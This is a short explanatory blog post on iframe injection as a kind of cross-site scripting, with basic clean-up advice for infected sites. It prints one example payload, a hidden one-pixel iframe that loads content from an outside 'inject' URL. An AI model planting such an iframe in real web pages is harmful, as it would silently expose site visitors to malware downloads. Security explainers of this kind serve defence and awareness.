What is Iframe Injection ? | HackThatCORE

Image Source: Hacking with new ideas

Iframe injection is a popular type of cross site scripting (or XSS) attack. Basically It consists of one or more iframe tags that are putted into a webpage content and downloads an executable program (mainly a malicious program) or conducts other malicious actions that compromises the security of visitor's computers. Moreover, it can affect both the site owner and visitor's computers with harmful malwares.
The simplest example of iframe injection is :
<iframe src="http://codeb-o-1.io/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden;"></iframe>

Preventions if your site is infected with iframe injection :

• Change all your security credentials like your passwords, account informations and other sensible data or if possible temporarily remove them from the infected website and even from your computer.
• Don't take your website online until the iframe injection has been removed properly.
• For further preventions from similar attacks, take a copy of the website data into a separate hard drive. This would also improve your website's privacy and security.